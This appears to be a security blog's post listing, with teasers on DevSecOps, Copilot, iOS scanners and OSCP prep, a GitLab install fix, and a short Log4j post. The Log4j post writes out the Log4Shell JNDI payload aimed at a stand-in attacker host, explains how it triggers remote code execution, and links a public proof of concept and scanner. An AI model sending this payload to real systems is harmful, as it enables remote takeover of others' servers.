Sep 21

DevSecOps — integrating SAST, SCA, Secrets detection, Container security and IaC scanning with JIT

Do you still remember when it took a long time to implement Security controls into your workflow? Let’s do it in 5 minutes with JIT.io — a modern DevSecOps Orchestration Platform! Let imagine the following workflow The list of Security Controls that will be added: Detecting secrets tool Static application…

Devsecops

3 min read

Aug 24

Could GitHub Copilot produce a vulnerable code?

GitHub Copilot is an interesting solution that promises to simplify the developer’s day-to-day tasks. This short article aims to answer the question: Could GitHub Copilot produce a vulnerable code? Could GitHub Copilot produce some sensitive information that may be real? …

Cybersecurity

7 min read

Could GitHub Copilot produce a vulnerable code?

Jul 23

Google Indexing — how to fix

Search engines doing really great job in indexing content. Of course everyone wants to be at the top of the search results. But sometimes it can lead to security issues. In this short article we will give a few examples and describe how you can fix the indexing problem. Note…

Hacking

2 min read

Feb 20

iOS Apps Security scanners practical comparison

In this article, I tried to overview: What iOS Apps Security Scanners exist on the market, What capabilities they provide, and what vulnerabilities they can discover. Given that new solutions and vulnerable applications often appear on the market, this article will be updated further. …

Security

5 min read

Jan 15

DevSecOps — What Security Controls exist and when to implement them?

In this short article, I tried to overview what Security Controls exists, what stage it can be added to the CI/CD process, and what benefits we receive. In simple words, DevSecOps is about adding different security controls at every step of your CI/CD process. The goal is to identify potential…

Devsecops

4 min read

Dec 22, 2021

Implementing Application Security on your project

The main purpose: CyberSecurity should help businesses succeed. Structure: 1. Main goal of Secure Software Development Life Cycle (SSDLC) 2. Controls that can be implemented on different stages of the Secure Software Development Life Cycle 3. What methods are the most effective in identifying vulnerabilities based on OWASP rating 4. Example of potential implementation…

Appsec

6 min read

Implementing Application Security on your project

Dec 10, 2021

Log4j 0-day RCE: Top companies affected

How it’s work: We send a specially formed request like $ {jndi: ldap: //attacker.host/blabla} to any place that can potentially be logged. JNDI (Java Naming and Directory Interface), in turn, processes the template, requests data via LDAP from attacker.host In the response, a JAVA class is given, which allows you to execute arbitrary code. PoC: https://github.com/tangxiaofeng7/apache-log4j-poc Log4j2 RCE BurpSuite Plugin: https://github.com/whwlsfb/Log4j2Scan

Rce

1 min read

Log4j 0-day RCE: Top companies affected

How it’s work:

We send a specially formed request like $ {jndi: ldap: //attacker.host/blabla} to any place that can potentially be logged.
JNDI (Java Naming and Directory Interface), in turn, processes the template, requests data via LDAP from attacker.host
In the response, a JAVA class is given, which allows you to execute arbitrary code.

PoC: https://github.com/tangxiaofeng7/apache-log4j-poc

Log4j2 RCE BurpSuite Plugin: https://github.com/whwlsfb/Log4j2Scan

What companies affected: https://github.com/YfryTchsGD/Log4jAttackSurface

Temporary fix: JAVA_OPTS = “- Dlog4j.formatMsgNoLookups = true”

Dec 10, 2021

FIX: Unable to locate package gitlab-ee

If you got “Unable to locate package gitlab-ee” error message, as displayed on the screenshot below Make the following two commands: Note: Don’t forget to change the domain. curl -L -o gitlab-ee_13.0.6.deb https://packages.gitlab.com/gitlab/gitlab-ee/packages/debian/buster/gitlab-ee_13.0.6-ee.0_amd64.deb/download.deb sudo EXTERNAL_URL=”http://gitlab.mcnz.com" apt install ./gitlab-ee_13.0.6.deb

Gitlab

1 min read

FIX: Unable to locate package gitlab-ee

If you got “Unable to locate package gitlab-ee” error message, as displayed on the screenshot below

Make the following two commands:

Note: Don’t forget to change the domain.

curl -L -o gitlab-ee_13.0.6.deb https://packages.gitlab.com/gitlab/gitlab-ee/packages/debian/buster/gitlab-ee_13.0.6-ee.0_amd64.deb/download.deb
sudo EXTERNAL_URL=”http://gitlab.mcnz.com" apt install ./gitlab-ee_13.0.6.deb

Dec 5, 2021

OSCP Preparation

Hi there, If you are reading this, you are most likely thinking about preparing and passing the OSCP exam. Why OSCP? It’s well known and highly respected cybersecurity certification. The OSCP exam is a 24 hours of proctored challenging hacking and 24 hour of detailed report writing with step-by-step explanation…

Oscp

2 min read

Dec 2, 2021

Buffer Overflow Preparation for OSCP

In this small article, I would like to describe the main steps in the most straightforward words and provide a short overview of “how the buffer overflow” might be done. You should be ready to solve this type of task for the OSCP exam. What you will have to work…

Oscp

4 min read

DevSecOps — integrating SAST, SCA, Secrets detection, Container security and IaC scanning with JIT

Could GitHub Copilot produce a vulnerable code?

Google Indexing — how to fix

iOS Apps Security scanners practical comparison

DevSecOps — What Security Controls exist and when to implement them?

Implementing Application Security on your project

Log4j 0-day RCE: Top companies affected

Log4j 0-day RCE: Top companies affected

FIX: Unable to locate package gitlab-ee

FIX: Unable to locate package gitlab-ee

OSCP Preparation

Buffer Overflow Preparation for OSCP

YevhSec1